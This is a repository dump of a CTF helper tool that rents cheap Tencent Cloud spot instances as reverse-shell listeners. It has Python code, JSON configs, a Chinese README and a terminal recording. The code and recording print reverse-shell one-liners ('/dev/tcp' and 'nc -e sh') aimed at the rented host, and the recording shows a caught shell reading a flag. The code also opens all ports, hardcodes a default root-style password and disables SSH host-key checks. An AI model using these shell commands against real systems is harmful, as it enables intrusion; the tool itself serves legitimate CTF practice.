├── running.json ├── .gitignore ├── requirements.txt ├── assets ├── image-20231203034133133.png ├── image-20231203034451967.png └── image-20231203042237605.png ├── README.md ├── demo.cast ├── hello_shell.json ├── hello_shell_template.json └── main.py /running.json: -------------------------------------------------------------------------------- 1 | {} -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | cred 2 | 原始数据文件 3 | running.json -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | tencentcloud-sdk-python-cvm 2 | tencentcloud-sdk-python-vpc -------------------------------------------------------------------------------- /assets/image-20231203034133133.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ProbiusOfficial/TCL/HEAD/assets/image-20231203034133133.png -------------------------------------------------------------------------------- /assets/image-20231203034451967.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ProbiusOfficial/TCL/HEAD/assets/image-20231203034451967.png -------------------------------------------------------------------------------- /assets/image-20231203042237605.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ProbiusOfficial/TCL/HEAD/assets/image-20231203042237605.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 腾讯云抢占式实例监听器 2 | 3 | 欢迎关注关联主项目:[Hello_CTF](https://github.com/ProbiusOfficial/Hello-CTF) 4 | 5 | 如果你在寻找一个纯免费的方案,推荐另一个项目[frp-R3shell](https://github.com/ProbiusOfficial/frp-R3shell) 6 | 7 | ![demo](https://github.com/ProbiusOfficial/Hello_CTF-Shell/assets/41804496/c5ce7ac6-289f-425c-9eb5-bb503249c0d3) 8 | 9 | 10 | ## 引言 11 | 12 | 你是否面临下面这些问题? 13 | 14 | "做题时,发现题目需要反弹shell,但是没有服务器!!" 15 | 16 | 又或者是,不在之前,不在之后,就恰巧这个时候——"我敲,哥们服务器怎么过期了!!!" 17 | 18 | 亦或者,服务器买来就只是为了弹个shell,但是却被大数据杀熟 —— 一台服务器,一年几百块,放着还生灰!?? 19 | ..... 20 | 这些都不是问题,反弹shell的廉价解决方案,它来了!!! 21 | 22 | 每个小时成本低至几分钱,随用随销毁,了事拂衣去,深藏功与名!!! 23 | 24 | ## 前提 25 | 26 | - 拥有一个腾讯云账号,并且完成实名认证,没有?快用我的链接注册呜呜呜:[点我注册](https://curl.qcloud.com/7YFqnsuM) 27 | 28 | - 在腾讯云上存留账户余额,建议5-10元,然后就能一直用下去!!(这也是使用腾讯云的原因,隔壁阿里的抢占实例虽然便宜几分但是需要预存120元以上余额,我的评价是**) 29 | 30 | - 在访问控制中获取你的 SecretID 和 SecretKey,[点我获取](https://console.cloud.tencent.com/cam/capi),注意一定要妥善保管,不要泄露给他人!!!建议使用子账号密钥,仅分配私有网络和云服务器的权限,以防被人恶意使用!!! 31 | 32 | - ~~确保在对应地区 有一个 **端口全开放** 的安全组~~ (12.3更新 如果没有对应安全组 则会自行创建安全组) 33 | 34 | - 为了更好的体验 请在云端配置公私钥实现免密登录!!! 35 | 36 | ## 使用方法 37 | 38 | - clone 本项目到本地 39 | 40 | ```bash 41 | git clone https://github.com/ProbiusOfficial/Hello_CTF-Shell.git 42 | ``` 43 | 44 | - 在目录中创建一个名为 `cred` 的文件,将你的 SecretID 和 SecretKey 写入,格式如下: 45 | 46 | ```json 47 | { 48 | "SecretId": "", 49 | "SecretKey": "", 50 | "Password":"r00t@HelloShell", 51 | "Description": "Password 是实例主机启动密码,需要包含大小写字母、数字和特殊字符,长度8-30位。默认为 r00t@HelloShell , 建议修改,推荐配置公私钥实现免密登录" 52 | } 53 | ``` 54 | 55 | - 安装依赖 56 | 57 | ```bash 58 | pip install -r requirements.txt 59 | ``` 60 | 61 | - 运行 62 | 63 | ```bash 64 | python main.py 65 | ``` 66 | 67 | 68 | ## 成本计算 69 | 70 | 目前机器的配置和计费如下: 71 | 72 | 选取优惠区域 **南京** 和 **香港** 73 | 74 | - module_1: 南京模块,配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5), 75 | 资费信息: 实例 ¥0.05 系统盘存储空间 ¥0.02 公网带宽按流量计费¥0.80/GB(内地) 每小时结算 平均资费 **-¥0.08/小时** 76 | 77 | - module_2: 香港模块,配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5), 78 | 资费信息: 实例¥0.01 系统盘存储空间¥0.03 公网带宽按流量计费¥0.67/GB(香港) 每小时结算 平均资费- **¥0.04/小时** 79 | 80 | ![image-20231203034133133](./assets/image-20231203034133133.png) 81 | 82 | ![image-20231203034451967](./assets/image-20231203034451967.png) 83 | 84 | **这几天写轮子弹来弹去一共只花了0.15!** 85 | 86 | **什么叫物美价廉!!!** 87 | 88 | ## 自定义? 89 | - 修改 hello_shell.json 中的配置信息,包括地域、镜像等内容,相关注释已经写在 hello_shell_template.json 文件中 90 | - 其他参数问题请查阅 腾讯云API [帮助文档](https://cloud.tencent.com/document/api),或访问[API Explorer](https://console.cloud.tencent.com/api/explorer) 91 | 92 | ## TODO 93 | - 等您的issue!! 94 | - 优化交互逻辑 95 | - 定制化镜像环境以直接支持log4j漏洞利用? 96 | - 更多功能!! 97 | -------------------------------------------------------------------------------- /demo.cast: -------------------------------------------------------------------------------- 1 | {"version": 2, "width": 120, "height": 30, "timestamp": 1702972880, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} 2 | [0.054313, "o", "\u001b[?2004h\u001b]0;tj@ProbiusOfficial: /mnt/d/git/Hello_CTF-Shell\u0007\u001b[01;32mtj@ProbiusOfficial\u001b[00m:\u001b[01;34m/mnt/d/git/Hello_CTF-Shell\u001b[00m$ "] 3 | [1.337216, "o", "p"] 4 | [1.592925, "o", "y"] 5 | [1.756924, "o", "t"] 6 | [1.868954, "o", "h"] 7 | [2.099858, "o", "\u0007on"] 8 | [2.686835, "o", "3"] 9 | [2.873557, "o", " "] 10 | [3.503953, "o", "m"] 11 | [3.667495, "o", "ain.py "] 12 | [4.223798, "o", "\r\n"] 13 | [4.223949, "o", "\u001b[?2004l\r"] 14 | [4.399831, "o", "********** CTF,启动!!! **********\r\n——反弹shell最廉价解决方案 By 探姬_Official\r\n\r\n了解你的捍卫者:\r\n>1 VPS,启动!(默认使用模块2)\r\n>2 到底要选哪个呢?(自定义启动模块)\r\n"] 15 | [4.40001, "o", ">3 全都烧光!(退还所有实例)\r\n>>> "] 16 | [5.45444, "o", "1"] 17 | [6.873053, "o", "\r\n"] 18 | [6.873981, "o", "已载入: 香港模块(公钥登录模块),配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5)\r\n资费信息: 实例¥0.01 系统盘存储空间¥0.03 公网带宽按流量计费¥0.67/GB(香港) 每小时结算 平均资费-¥0.04/小时\r\n"] 19 | [7.156331, "o", "在该地区查询到 1 个安全组, id为 sg-7wt7iwrd 成功创建实例 ID ins-j0i3z9je\r\n"] 20 | [7.733576, "o", "等待实例 ins-j0i3z9je 初始化...\r\n"] 21 | [8.485717, "o", "ubuntu@43.128.47.223 创建完成 机型 S5.MEDIUM2\r\n"] 22 | [9.486164, "o", "初始化ssh连接...\r\n提示:您可以使用 'nc -lvnp 9001' 建立监听,在使用目标机上使用 'sh -i >& /dev/tcp/43.128.47.223/9001 0>&1' 或者 'nc 43.128.47.223 9001 -e sh' 建立反弹shell \r\nssh ubuntu@43.128.47.223 如果非公钥登录请使用设置的密码 r00t@HelloShell \r\n"] 23 | [10.75352, "o", "Welcome to Ubuntu 22.04 LTS (GNU/Linux 5.15.0-88-generic x86_64)\r\n\r\n * Documentation: https://help.ubuntu.com\r\n * Management: https://landscape.canonical.com\r\n * Support: https://ubuntu.com/advantage\r\n\r\n System information as of Tue Dec 19 04:02:07 PM CST 2023\r\n\r\n System load: 0.67626953125 Processes: 119\r\n Usage of /: 18.4% of 19.58GB Users logged in: 0\r\n Memory usage: 9% IPv4 address for eth0: 172.19.0.19\r\n Swap usage: 0%\r\n\r\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\r\n just raised the bar for easy, resilient and secure K8s cluster deployment.\r\n\r\n https://ubuntu.com/engage/secure-kubernetes-at-the-edge\r\n\r\n"] 24 | [11.793435, "o", "To run a command as administrator (user \"root\"), use \"sudo \".\r\nSee \"man sudo_root\" for details.\r\n\r\n"] 25 | [11.923311, "o", "\u001b[?2004h\u001b]0;ubuntu@VM-0-19-ubuntu: ~\u0007\u001b[01;32mubuntu@VM-0-19-ubuntu\u001b[00m:\u001b[01;34m~\u001b[00m$ "] 26 | [12.22943, "o", "\u001b[7mnc -lvnp 9001\u001b[27m"] 27 | [13.176073, "o", "\u0007"] 28 | [13.176327, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\bnc -lvnp 9001"] 29 | [13.569568, "o", "\r\n\u001b[?2004l\r"] 30 | [13.576763, "o", "Listening on 0.0.0.0 9001\r\n"] 31 | [14.605474, "o", "Connection received on 1.14.71.254 46375\r\n"] 32 | [15.819826, "o", "c"] 33 | [15.938022, "o", "a"] 34 | [16.178798, "o", "t"] 35 | [16.36624, "o", " "] 36 | [16.801566, "o", "/"] 37 | [17.316992, "o", "f"] 38 | [17.520704, "o", "l"] 39 | [17.605282, "o", "a"] 40 | [17.707519, "o", "g"] 41 | [18.062859, "o", "\r\n"] 42 | [18.31438, "o", "NSSCTF{3d8af4ea-61d3-4651-8e00-2394b3f5ad4a}\r\n"] 43 | -------------------------------------------------------------------------------- /hello_shell.json: -------------------------------------------------------------------------------- 1 | { 2 | "module_1":{ 3 | "region":"ap-nanjing", 4 | "description":"南京模块,配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5)", 5 | "Price":"实例 ¥0.05 系统盘存储空间 ¥0.02 公网带宽按流量计费¥0.80/GB(内地) 每小时结算 平均资费-¥0.08/小时", 6 | "params":{ 7 | "InstanceChargeType": "SPOTPAID", 8 | "Placement": { 9 | "Zone": "ap-nanjing-2" 10 | }, 11 | "ImageId": "img-487zeit5", 12 | "SystemDisk": { 13 | "DiskSize": 20 14 | }, 15 | "InternetAccessible": { 16 | "InternetChargeType": "TRAFFIC_POSTPAID_BY_HOUR", 17 | "InternetMaxBandwidthOut": 10, 18 | "PublicIpAssigned": true 19 | }, 20 | "InstanceCount": 1, 21 | "InstanceName": "HelloShell", 22 | "LoginSettings": { 23 | "Password": "r00t@HelloShell" 24 | }, 25 | "SecurityGroupIds": [ "sg-94qbn8va" ], 26 | "EnhancedService": { 27 | "SecurityService": { 28 | "Enabled": true 29 | }, 30 | "MonitorService": { 31 | "Enabled": true 32 | } 33 | } 34 | } 35 | }, 36 | "module_2":{ 37 | "region":"ap-hongkong", 38 | "description":"香港模块,配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5)", 39 | "Price":"实例¥0.01 系统盘存储空间¥0.03 公网带宽按流量计费¥0.67/GB(香港) 每小时结算 平均资费-¥0.04/小时", 40 | "params":{ 41 | "InstanceChargeType": "SPOTPAID", 42 | "Placement": { 43 | "Zone": "ap-hongkong-2" 44 | }, 45 | "ImageId": "img-487zeit5", 46 | "SystemDisk": { 47 | "DiskSize": 20 48 | }, 49 | "InternetAccessible": { 50 | "InternetChargeType": "TRAFFIC_POSTPAID_BY_HOUR", 51 | "InternetMaxBandwidthOut": 10, 52 | "PublicIpAssigned": true 53 | }, 54 | "InstanceCount": 1, 55 | "InstanceName": "HelloShell", 56 | "LoginSettings": { 57 | "Password": "r00t@HelloShell" 58 | }, 59 | "SecurityGroupIds": [ "sg-8ctcv6d1" ], 60 | "EnhancedService": { 61 | "SecurityService": { 62 | "Enabled": true 63 | }, 64 | "MonitorService": { 65 | "Enabled": true 66 | } 67 | } 68 | } 69 | }, 70 | "module_3":{ 71 | "region":"ap-hongkong", 72 | "description":"香港模块(公钥登录模块),配置信息为2核心2G内存,20G系统盘,10M带宽,镜像为Ubuntu Server 22.04 LTS 64位(ID:img-487zeit5)", 73 | "Price":"实例¥0.01 系统盘存储空间¥0.03 公网带宽按流量计费¥0.67/GB(香港) 每小时结算 平均资费-¥0.04/小时", 74 | "params":{ 75 | "InstanceChargeType": "SPOTPAID", 76 | "Placement": { 77 | "Zone": "ap-hongkong-2" 78 | }, 79 | "ImageId": "img-487zeit5", 80 | "SystemDisk": { 81 | "DiskSize": 20 82 | }, 83 | "InternetAccessible": { 84 | "InternetChargeType": "TRAFFIC_POSTPAID_BY_HOUR", 85 | "InternetMaxBandwidthOut": 10, 86 | "PublicIpAssigned": true 87 | }, 88 | "InstanceCount": 1, 89 | "InstanceName": "HelloShell", 90 | "LoginSettings": { 91 | "KeyIds": [ "skey-i5d3b9vd" ] 92 | }, 93 | "SecurityGroupIds": [ "sg-8ctcv6d1" ], 94 | "EnhancedService": { 95 | "SecurityService": { 96 | "Enabled": true 97 | }, 98 | "MonitorService": { 99 | "Enabled": true 100 | } 101 | } 102 | } 103 | } 104 | } -------------------------------------------------------------------------------- /hello_shell_template.json: -------------------------------------------------------------------------------- 1 | { 2 | 3 | "module_模板":{ 4 | "region":"地域", 5 | "description":"描述", 6 | "Price":"价格组成", 7 | "params":"参数组成", 8 | "params参数示例":{ 9 | "InstanceChargeType": "计价类型,一般使用 SPOTPAID 竞价实例,其他类型: PREPAID:预付费,即包年包月 POSTPAID_BY_HOUR:按小时后付费 CDHPAID:独享子机(基于专用宿主机创建,宿主机部分的资源不收费) SPOTPAID:竞价付费 CDCPAID:专用集群付费", 10 | "InstanceChargePrepaid": { 11 | "Period": null, 12 | "RenewFlag": null 13 | }, 14 | "Placement": { 15 | "Zone": "实例所属的可用区ID。该参数可以通过调用 DescribeZones 的返回值中的Zone字段来获取。" 16 | }, 17 | "InstanceType": null, 18 | "ImageId": "镜像ID, Ubuntu Server 22.04 LTS 64位:img-487zeit5 | TencentOS Server 3.1 (TK4):img-eb30mz89 |Debian 12.0 64位:img-7ag0z2jt", 19 | "SystemDisk": { 20 | "DiskSize": "系统盘容量 | int64 单位GB | 计费准则 内地 ¥0.01/10GB/小时 " 21 | }, 22 | "DataDisks": [ 23 | { 24 | "DiskType": null, 25 | "DiskId": null, 26 | "DiskSize": null, 27 | "DeleteWithInstance": null, 28 | "SnapshotId": null, 29 | "Encrypt": null, 30 | "KmsKeyId": null, 31 | "ThroughputPerformance": null, 32 | "CdcId": null, 33 | "BurstPerformance": null 34 | } 35 | ], 36 | "VirtualPrivateCloud": { 37 | "VpcId": null, 38 | "SubnetId": null, 39 | "AsVpcGateway": null, 40 | "PrivateIpAddresses": [ 41 | null 42 | ], 43 | "Ipv6AddressCount": null 44 | }, 45 | "InternetAccessible": { 46 | "PublicIpAssigned": true, 47 | "InternetMaxBandwidthOut": "公网出带宽上限,单位: Mbps | init64", 48 | "InternetChargeType": "网络计费类型。取值范围: BANDWIDTH_PREPAID: 预付费按带宽结算 | TRAFFIC_POSTPAID_BY_HOUR: 流量按小时后付费 | BANDWIDTH_POSTPAID_BY_HOUR: 带宽按小时后付费 | BANDWIDTH_PACKAGE: 带宽包用户 | 默认取值: 非带宽包用户默认与子机付费类型保持一致,比如子机付费类型为预付费,网络计费类型默认为预付费;子机付费类型为后付费,网络计费类型默认为后付费。" 49 | 50 | }, 51 | "InstanceCount": 1, 52 | "InstanceName": "HelloShell", 53 | "LoginSettings": { 54 | "Password": "实例登录密码。不同操作系统类型密码复杂度限制不一样,具体如下: | Linux实例密码必须8到30位,至少包括两项[a-z],[A-Z]、[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = | { } [ ] : ; ' , . ? / ]中的特殊符号。 | Windows实例密码必须12到30位,至少包括三项[a-z],[A-Z],[0-9] 和 [( ) ` ~ ! @ # $ % ^ & * - + = | { } [ ] : ; ' , . ? /]中的特殊符号。 | 若不指定该参数,则由系统随机生成密码,并通过站内信方式通知到用户。", 55 | "KeyIds": [ 56 | "密钥ID列表。关联密钥后,就可以通过对应的私钥来访问实例;KeyId可通过接口DescribeKeyPairs获取,密钥与密码不能同时指定," 57 | ] 58 | }, 59 | "SecurityGroupIds": [ 60 | "实例所属安全组。若不指定该参数,则绑定默认安全组。| 建议在所属地区创建一个全开放安全组用于反弹shell" 61 | ], 62 | "EnhancedService": { 63 | "SecurityService": { 64 | "Enabled": true 65 | }, 66 | "MonitorService": { 67 | "Enabled": true 68 | } 69 | }, 70 | "ClientToken": null, 71 | "HostName": null, 72 | "ActionTimer": { 73 | "TimerAction": null, 74 | "ActionTime": null, 75 | "Externals": { 76 | "ReleaseAddress": null, 77 | "UnsupportNetworks": [ 78 | null 79 | ], 80 | "StorageBlockAttr": { 81 | "Type": null, 82 | "MinSize": null, 83 | "MaxSize": null 84 | } 85 | } 86 | }, 87 | "DisasterRecoverGroupIds": [ 88 | null 89 | ], 90 | "TagSpecification": [ 91 | { 92 | "ResourceType": null, 93 | "Tags": [ 94 | { 95 | "Key": null, 96 | "Value": null 97 | } 98 | ] 99 | } 100 | ], 101 | "InstanceMarketOptions": { 102 | "MarketType": null, 103 | "SpotOptions": { 104 | "MaxPrice": null, 105 | "SpotInstanceType": null 106 | } 107 | }, 108 | "UserData": null, 109 | "DryRun": null, 110 | "CamRoleName": null, 111 | "HpcClusterId": null, 112 | "LaunchTemplate": { 113 | "LaunchTemplateId": null, 114 | "LaunchTemplateVersion": null 115 | }, 116 | "DedicatedClusterId": null, 117 | "ChcIds": [ 118 | null 119 | ], 120 | "DisableApiTermination": null 121 | } 122 | } 123 | } -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import json 2 | import subprocess 3 | from time import sleep 4 | from tencentcloud.common import credential 5 | from tencentcloud.common.profile.client_profile import ClientProfile 6 | from tencentcloud.common.profile.http_profile import HttpProfile 7 | from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException 8 | from tencentcloud.cvm.v20170312 import cvm_client, models as cvm_models # pip install tencentcloud-sdk-python-cvm 9 | from tencentcloud.vpc.v20170312 import vpc_client, models as vpc_models # pip install tencentcloud-sdk-python-vpc 10 | 11 | def get_cred(credfile): 12 | with open(credfile, 'r', encoding='utf-8-sig') as file: 13 | credentials = json.load(file) 14 | secret_id = credentials.get('SecretId') 15 | secret_key = credentials.get('SecretKey') 16 | password = credentials.get('Password') 17 | cred = credential.Credential(secret_id, secret_key) 18 | return cred, password 19 | 20 | def get_clientProfile(type): 21 | httpProfile = HttpProfile() 22 | httpProfile.endpoint = type + ".tencentcloudapi.com" 23 | clientProfile = ClientProfile(httpProfile=httpProfile) 24 | return clientProfile 25 | 26 | # 模块加载器 27 | def module_loader(module): 28 | module_config_file = 'hello_shell.json' 29 | try: 30 | with open(module_config_file, 'r',encoding='utf-8-sig') as file: 31 | templates = json.load(file) 32 | if module in templates: 33 | module_info = templates[module] 34 | description = module_info.get('description', 'N/A') 35 | price = module_info.get('Price', 'N/A') 36 | region = module_info.get('region', 'N/A') 37 | params = module_info.get('params', {}) 38 | print(f"已载入: {description}\n资费信息: {price}") 39 | return region, params 40 | else: 41 | print(f"无效配置 未找到对应模块'{module}' ") 42 | except FileNotFoundError: 43 | print(f"配置文件 '{module_config_file}' 的坐标呢?") 44 | except json.JSONDecodeError: 45 | print(f"'{module_config_file}'是什么破玩意,理解不了!说了让你用json 用json!!! ") 46 | 47 | # 安全组查询 48 | def check_security_group(cred, clientProfile,region): 49 | try: 50 | client = vpc_client.VpcClient(cred, region, clientProfile) 51 | 52 | req = vpc_models.DescribeSecurityGroupsRequest() 53 | params = {} 54 | req.from_json_string(json.dumps(params)) 55 | resp = client.DescribeSecurityGroups(req) 56 | resp_json = json.loads(resp.to_json_string()) 57 | 58 | security_groups = resp_json.get("SecurityGroupSet", []) 59 | total_count = len(security_groups) 60 | print(f"在该地区查询到 {total_count} 个安全组, id为", end=' ') 61 | for group in security_groups: 62 | print(group["SecurityGroupId"], end=' ') 63 | 64 | for group in security_groups: 65 | if "放通全部端口" in group["SecurityGroupName"]: 66 | return group["SecurityGroupId"] 67 | print("\n没有检测到全通安全组,正在创建...") 68 | return create_security_group(cred, clientProfile, region) 69 | 70 | 71 | except TencentCloudSDKException as err: 72 | print(f"Error occurred: {err}") 73 | return None 74 | 75 | # 安全组创建 76 | def create_security_group(cred, clientProfile, region): 77 | try: 78 | client = vpc_client.VpcClient(cred, region, clientProfile) 79 | 80 | req = vpc_models.CreateSecurityGroupWithPoliciesRequest() 81 | params = { 82 | "GroupName": "HelloShell-放通全部端口", 83 | "GroupDescription": "放通全部端口-buildByHelloShell", 84 | "SecurityGroupPolicySet": { 85 | "Egress": [ 86 | { 87 | "PolicyIndex": 0, 88 | "Protocol": "ALL", 89 | "Port": "ALL", 90 | "Action": "ACCEPT" 91 | } 92 | ], 93 | "Ingress": [ 94 | { 95 | "Protocol": "ALL", 96 | "Port": "ALL", 97 | "Action": "ACCEPT" 98 | } 99 | ] 100 | } 101 | } 102 | req.from_json_string(json.dumps(params)) 103 | resp = client.CreateSecurityGroupWithPolicies(req) 104 | resp_json = json.loads(resp.to_json_string()) 105 | print(f"创建安全组 {resp_json['SecurityGroup']['SecurityGroupId']} 成功") 106 | return resp_json["SecurityGroup"]["SecurityGroupId"] 107 | 108 | except TencentCloudSDKException as err: 109 | print(f"Error occurred: {err}") 110 | return None 111 | # 查询实例 112 | def describe_instances(cred, clientProfile, region, InstanceIds): 113 | try: 114 | client = cvm_client.CvmClient(cred, region, clientProfile) 115 | req = cvm_models.DescribeInstancesRequest() 116 | params = { 117 | "InstanceIds": [InstanceIds] 118 | } 119 | req.from_json_string(json.dumps(params)) 120 | resp = client.DescribeInstances(req) 121 | resp_json = json.loads(resp.to_json_string()) 122 | 123 | if resp_json.get("TotalCount", 0) > 0: 124 | instance_info = resp_json["InstanceSet"][0] 125 | 126 | if "PublicIpAddresses" in instance_info and instance_info["PublicIpAddresses"]: 127 | public_ip = instance_info["PublicIpAddresses"][0] 128 | instance_type = instance_info.get("InstanceType", "Unknown") 129 | instance_data = { 130 | "username_at_ip": f"ubuntu@{public_ip}", 131 | "region": region 132 | } 133 | 134 | print(f"ubuntu@{public_ip} 创建完成 机型 {instance_type}") 135 | global ip 136 | ip = public_ip 137 | 138 | try: 139 | with open("running.json", "r") as file: 140 | existing_data = json.load(file) 141 | except FileNotFoundError: 142 | existing_data = {} 143 | 144 | 145 | existing_data[InstanceIds] = instance_data 146 | 147 | with open("running.json", "w") as file: 148 | json.dump(existing_data, file) 149 | 150 | return public_ip 151 | else: 152 | print(f"等待实例 {instance_id} 初始化...") 153 | sleep(5) 154 | return describe_instances(cred, clientProfile, region, InstanceIds) 155 | else: 156 | print("未找到指定的实例") 157 | return None 158 | 159 | except TencentCloudSDKException as err: 160 | print(err) 161 | return None 162 | 163 | 164 | # 创建实例 165 | def create_instance(cred, clientProfile, region, params, openID, passwd): 166 | try: 167 | client = cvm_client.CvmClient(cred, region, clientProfile) 168 | req = cvm_models.RunInstancesRequest() 169 | 170 | params["SecurityGroupIds"] = [openID] 171 | # 如果 params["LoginSettings"]["Password"] 不存在,即为公钥登录 172 | if "LoginSettings" in params and "Password" in params["LoginSettings"]: 173 | params["LoginSettings"]["Password"] = passwd 174 | 175 | req.from_json_string(json.dumps(params)) 176 | resp = client.RunInstances(req) 177 | resp_json = json.loads(resp.to_json_string()) 178 | 179 | instance_id_set = resp_json.get("InstanceIdSet", []) 180 | if instance_id_set: 181 | instance_id = instance_id_set[0] 182 | print(f"成功创建实例 ID {instance_id}") 183 | return instance_id 184 | else: 185 | print("未能成功创建实例 报错信息如下") 186 | return None 187 | 188 | except TencentCloudSDKException as err: 189 | print(err) 190 | return None 191 | 192 | # 退还实例 193 | def terminate_instance(cred, clientProfile, InstanceIds=None): 194 | try: 195 | # 从文件读取运行中的实例信息 196 | with open("running.json", "r") as file: 197 | running_instances = json.load(file) 198 | 199 | if InstanceIds: 200 | # 退还指定的实例 201 | if InstanceIds in running_instances: 202 | instance_info = running_instances[InstanceIds] 203 | region = instance_info["region"] 204 | client = cvm_client.CvmClient(cred, region, clientProfile) 205 | 206 | print(f"运行中 ID:{instance_info['username_at_ip']}") 207 | 208 | req = cvm_models.TerminateInstancesRequest() 209 | params = {"InstanceIds": [InstanceIds]} 210 | req.from_json_string(json.dumps(params)) 211 | resp = client.TerminateInstances(req) 212 | 213 | print(f"实例 {InstanceIds} 已退还") 214 | del running_instances[InstanceIds] 215 | else: 216 | print(f"实例 {InstanceIds} 不存在或已被退还") 217 | 218 | else: 219 | # 退还所有实例 220 | for InstanceId, instance_info in running_instances.items(): 221 | region = instance_info["region"] 222 | client = cvm_client.CvmClient(cred, region, clientProfile) 223 | 224 | print(f"运行中 ID:{instance_info['username_at_ip']}") 225 | 226 | req = cvm_models.TerminateInstancesRequest() 227 | params = {"InstanceIds": [InstanceId]} 228 | req.from_json_string(json.dumps(params)) 229 | resp = client.TerminateInstances(req) 230 | 231 | print(f"实例 {InstanceId} 已退还") 232 | running_instances.clear() 233 | 234 | 235 | with open("running.json", "w") as file: 236 | json.dump(running_instances, file) 237 | 238 | except FileNotFoundError: 239 | print("没有找到 'running.json' 文件") 240 | except json.JSONDecodeError: 241 | print("'running.json' 文件格式错误") 242 | except TencentCloudSDKException as err: 243 | print(err) 244 | 245 | def start_ssh_session(username, ip): 246 | if ip is None: 247 | print("实例创建出现问题,请检查日志") 248 | return 249 | ssh_command = ["ssh", "-o", "StrictHostKeyChecking=no", f"{username}@{ip}"] 250 | subprocess.run(ssh_command) 251 | 252 | def print_project_info(): 253 | print("********** CTF,启动!!! **********") 254 | print("——反弹shell最廉价解决方案 By 探姬_Official") 255 | 256 | 257 | if __name__ == "__main__": 258 | print_project_info() 259 | ip = None 260 | 261 | 262 | print("\n了解你的捍卫者:") 263 | print(">1 VPS,启动!(默认使用模块2)") 264 | print(">2 到底要选哪个呢?(自定义启动模块)") 265 | print(">3 全都烧光!(退还所有实例)") 266 | 267 | choice = input(">>> ") 268 | 269 | 270 | cred, passwd = get_cred("cred") 271 | cvm_clientProfile = get_clientProfile("cvm") 272 | vpc_clientProfile = get_clientProfile("vpc") 273 | 274 | if choice == '1': 275 | # 默认使用模块3创建一台服务器 276 | region, params = module_loader("module_2") 277 | openID = check_security_group(cred, vpc_clientProfile, region) 278 | instance_id = create_instance(cred, cvm_clientProfile, region, params, openID, passwd) 279 | describe_instances(cred, cvm_clientProfile, region, instance_id) 280 | print("初始化ssh连接...") 281 | print(f"提示:您可以使用 'nc -lvnp 9001' 建立监听,在使用目标机上使用 'sh -i >& /dev/tcp/{ip}/9001 0>&1' 或者 'nc {ip} 9001 -e sh' 建立反弹shell ") 282 | print(f"ssh ubuntu@{ip} 如果非公钥登录请使用设置的密码 {passwd} ") 283 | start_ssh_session('ubuntu', ip) 284 | start_ssh_session('ubuntu', ip) 285 | 286 | 287 | elif choice == '2': 288 | # 自定义启动模块 289 | with open('hello_shell.json', 'r', encoding='utf-8-sig') as file: 290 | templates = json.load(file) 291 | 292 | print("\n可用模块:") 293 | for key, value in templates.items(): 294 | print(f"{key}: {value['description']}, 资费信息: {value['Price']}") 295 | 296 | module_choice = input("\n请选择要使用的模块 (例如: module_3): ") 297 | if module_choice in templates: 298 | region, params = module_loader(module_choice) 299 | openID = check_security_group(cred, vpc_clientProfile, region) 300 | instance_id = create_instance(cred, cvm_clientProfile, region, params, openID, passwd) 301 | describe_instances(cred, cvm_clientProfile, region, instance_id) 302 | else: 303 | print("无效的模块选择") 304 | 305 | elif choice == '3': 306 | # 退还所有实例 307 | terminate_instance(cred, cvm_clientProfile) 308 | 309 | else: 310 | print("?你在选什么!") 311 | --------------------------------------------------------------------------------